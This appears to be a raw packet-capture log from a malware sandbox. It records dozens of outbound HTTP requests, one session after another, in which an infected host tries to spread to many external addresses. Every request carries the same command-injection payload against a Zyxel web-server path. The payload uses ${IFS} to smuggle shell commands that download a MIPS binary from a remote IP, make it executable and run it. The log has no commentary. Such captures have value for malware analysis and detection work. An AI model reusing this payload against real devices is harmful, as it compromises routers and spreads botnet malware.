                                                Jan 29, 2024 07:07:46.297928095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3790192.168.2.234104847.75.26.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.297991991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3791192.168.2.2334948177.26.152.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298054934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3792192.168.2.2357208164.15.210.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298122883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3793192.168.2.2351066158.105.21.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298204899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3794192.168.2.234911435.231.122.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298264027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3795192.168.2.235783464.148.47.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298329115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3796192.168.2.2336060108.70.106.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298402071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3797192.168.2.235746625.239.213.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298453093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3798192.168.2.2341280175.162.181.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298516989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3799192.168.2.2353678167.239.111.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298593044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3800192.168.2.2356298106.205.60.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298630953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3801192.168.2.2342748136.34.45.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298705101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3802192.168.2.2349206192.234.184.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298763990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3803192.168.2.2355504170.38.208.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298827887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3804192.168.2.2344428108.103.103.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298871040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3805192.168.2.2360860130.82.184.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298938036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3806192.168.2.2333424161.190.218.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.298996925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3807192.168.2.2333734113.124.70.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299072027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3808192.168.2.235719219.201.43.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299128056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3809192.168.2.234426683.122.37.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299192905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3810192.168.2.2357652177.21.182.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299266100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3811192.168.2.2343430111.63.11.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299319983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3812192.168.2.235835460.12.99.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299388885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3813192.168.2.2339128163.236.170.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299460888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3814192.168.2.234201445.41.88.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299520016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3815192.168.2.235424249.126.231.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299570084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3816192.168.2.2334666177.105.254.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299652100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3817192.168.2.2355968211.33.55.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299701929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3818192.168.2.233475488.23.164.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299746990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3819192.168.2.2340030216.14.123.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299803972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3820192.168.2.2339944144.155.129.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299860001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3821192.168.2.233911478.220.172.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299917936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3822192.168.2.2335716221.228.63.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.299978971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3823192.168.2.2342488140.247.124.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300041914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3824192.168.2.2354240125.254.208.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300097942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3825192.168.2.2350262196.247.71.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300163984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3826192.168.2.2358970140.96.81.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300230026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3827192.168.2.235583075.172.28.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300291061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3828192.168.2.2358690192.97.164.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300343990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3829192.168.2.2350962152.146.82.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300415993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3830192.168.2.235122693.249.149.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300462961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3831192.168.2.233385849.184.46.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300518036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3832192.168.2.2345216100.207.148.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300595999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3833192.168.2.234809247.72.114.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300647020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3834192.168.2.235566814.112.31.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300705910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3835192.168.2.2349246178.154.198.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300757885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3836192.168.2.2356036163.13.102.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300822973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3837192.168.2.235480898.167.52.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300873995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3838192.168.2.234121298.79.80.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300921917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3839192.168.2.2341228187.117.117.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.300981998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3840192.168.2.2357216122.154.22.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301043034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3841192.168.2.2338956148.116.133.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301100016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3842192.168.2.2349862205.112.150.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301167965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3843192.168.2.2339324153.179.136.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301240921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3844192.168.2.236011035.213.2.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301279068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3845192.168.2.2346196101.45.137.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301347017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3846192.168.2.235749812.219.229.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301414013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3847192.168.2.2337852173.241.137.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301485062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3848192.168.2.233880470.87.140.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301547050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3849192.168.2.234073868.139.3.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301606894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3850192.168.2.23572764.201.42.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301682949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3851192.168.2.234370252.121.228.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301769018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3852192.168.2.2345748212.138.72.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301846027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3853192.168.2.2358146220.89.147.19443
                                                TimestampBytes transferredDirectionData
